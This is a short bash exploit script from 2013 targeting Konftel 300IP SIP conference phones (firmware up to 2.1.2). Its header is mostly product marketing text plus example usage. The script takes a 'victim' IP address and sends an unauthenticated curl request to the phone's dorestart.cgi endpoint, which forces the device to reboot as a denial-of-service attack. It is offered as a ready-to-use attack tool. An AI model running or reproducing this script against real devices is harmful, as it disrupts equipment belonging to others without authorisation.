#!/bin/bash # Konftel 300IP SIP-based Conference phone <= 2.1.2 remote bypass reboot exploit # # by Todor Donev / 03.2013 / Sofia,Bulgaria # email: todor dot donev at gmail com # type: hardware # # The Konftel 300IP is a flexible SIP-based conference phone, # perfect for companies that use IP voice services. Its clear, # natural sound comes from OmniSound HD, Konftel鈥檚 patented # wideband audio technology. The stylishly designed # Konftel 300IP is packed with intelligent features for more # efficient conference calls. Record and store meetings on a # SD memory card. Use the conference guide to call # pre-programmed groups with just a few simple pushes of a # button. Conveniently import and export contact details via # the Web interface. Create your own phone book with the # personal user profile feature. The Konftel 300IP is also # ideal for larger conferences since it can accommodate # expansion microphones, an external wireless headset and a # PA system. With the Konftel 300IP your company will have # a conference phone that combines all the benefits of IP # voice service with innovative new features. # # Example usage: # [exploits@amnesium]$ ./k300IP-rbr.sh 192.168.1.180 # Konftel 300IP SIP-based Conference phone <= 2.1.2 remote bypass reboot exploit # Rebooting 192.168.1.180.. # Sleeping 30 secs, before rebooting # curl: (7) couldn't connect to host # # Special greetings for Tsvetelina Emirska, Stilyan Angelov and all my other friends! if [ $# != 1 ]; then echo "usg: $0 <victim>" exit; fi echo "Konftel 300IP SIP-based Conference phone <= 2.1.2 remote bypass reboot exploit" echo "Rebooting $1.." curl http://$1/cgi-bin/dorestart.cgi?doit=Reboot &>/dev/null echo "Sleeping 30 secs before rebooting" sleep 30 curl $1